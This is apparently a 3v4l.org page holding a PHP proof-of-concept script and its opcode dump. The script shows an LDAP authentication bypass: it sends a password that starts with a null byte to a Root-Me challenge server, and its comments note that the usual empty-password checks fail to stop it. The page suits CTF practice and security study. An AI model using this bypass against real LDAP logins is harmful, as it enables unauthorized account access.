3v4l.org

run code in 300+ PHP versions simultaneously
<?php $username="alex.everett@okstate.edu"; //LDAP rdn or dn $password="\x00\x41"; //associated password (poison null byte) // $username=$_POST['username']; //uncomment to test POST request // $password=$_POST['password']; //uncomment to test POST request if (!$username or !$password) { exit(); //typical check for no username or password } //end check 1 if (empty($username) or empty($password)) { exit(); //typical check for no username or password }//end check 2 if (is_null($username) or is_null($password)) { exit(); //typical check for no username or password }//end check 3 //notice that typical checks will not prevent the attack echo(strlen($password) . "\r\n"); //outputs the length of the string // connect to ldap server $ldapconn = ldap_connect("challenge01.root-me.org", "54013") //LDAP server or die("Could not connect to LDAP server"); if ($ldapconn) { // binding to ldap server $ldapbind = ldap_bind($ldapconn, $username, $password); //verify binding. Note that the complete data is not passed. if ($ldapbind) { echo "LDAP bind successful..."; } else { echo "LDAP bind failed..."; } } ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 4, Position 2 = 6
Branch analysis from position: 4
2 jumps found. (Code = 43) Position 1 = 7, Position 2 = 8
Branch analysis from position: 7
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 8
2 jumps found. (Code = 47) Position 1 = 10, Position 2 = 12
Branch analysis from position: 10
2 jumps found. (Code = 43) Position 1 = 13, Position 2 = 14
Branch analysis from position: 13
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 47) Position 1 = 16, Position 2 = 18
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 19, Position 2 = 20
Branch analysis from position: 19
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 20
2 jumps found. (Code = 47) Position 1 = 29, Position 2 = 31
Branch analysis from position: 29
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 32, Position 2 = 42
Branch analysis from position: 32
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 41
Branch analysis from position: 39
1 jumps found. (Code = 42) Position 1 = 42
Branch analysis from position: 42
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 42
Branch analysis from position: 18
Branch analysis from position: 12
Branch analysis from position: 6
filename:       /in/gg279
function name:  (null)
number of ops:  43
compiled vars:  !0 = $username, !1 = $password, !2 = $ldapconn, !3 = $ldapbind
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   ASSIGN                                                   !0, 'alex.everett%40okstate.edu'
    3     1        ASSIGN                                                   !1, '%00A'
    6     2        BOOL_NOT                                         ~6      !0
          3      > JMPNZ_EX                                         ~6      ~6, ->6
          4    >   BOOL_NOT                                         ~7      !1
          5        BOOL                                             ~6      ~7
          6    > > JMPZ                                                     ~6, ->8
    7     7    > > EXIT                                                     
    9     8    >   ISSET_ISEMPTY_CV                                 ~8      !0
          9      > JMPNZ_EX                                         ~8      ~8, ->12
         10    >   ISSET_ISEMPTY_CV                                 ~9      !1
         11        BOOL                                             ~8      ~9
         12    > > JMPZ                                                     ~8, ->14
   10    13    > > EXIT                                                     
   12    14    >   TYPE_CHECK                                    2  ~10     !0
         15      > JMPNZ_EX                                         ~10     ~10, ->18
         16    >   TYPE_CHECK                                    2  ~11     !1
         17        BOOL                                             ~10     ~11
         18    > > JMPZ                                                     ~10, ->20
   13    19    > > EXIT                                                     
   17    20    >   STRLEN                                           ~12     !1
         21        CONCAT                                           ~13     ~12, '%0D%0A'
         22        ECHO                                                     ~13
   20    23        INIT_FCALL_BY_NAME                                       'ldap_connect'
         24        SEND_VAL_EX                                              'challenge01.root-me.org'
         25        SEND_VAL_EX                                              '54013'
         26        DO_FCALL                                      0  $14     
         27        ASSIGN                                           ~15     !2, $14
         28      > JMPNZ_EX                                         ~15     ~15, ->31
   21    29    > > EXIT                                                     'Could+not+connect+to+LDAP+server'
         30*       BOOL                                             ~15     <true>
   22    31    > > JMPZ                                                     !2, ->42
   24    32    >   INIT_FCALL_BY_NAME                                       'ldap_bind'
         33        SEND_VAR_EX                                              !2
         34        SEND_VAR_EX                                              !0
         35        SEND_VAR_EX                                              !1
         36        DO_FCALL                                      0  $16     
         37        ASSIGN                                                   !3, $16
   26    38      > JMPZ                                                     !3, ->41
   27    39    >   ECHO                                                     'LDAP+bind+successful...'
   26    40      > JMP                                                      ->42
   29    41    >   ECHO                                                     'LDAP+bind+failed...'
   32    42    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
145.14 ms | 1453 KiB | 13 Q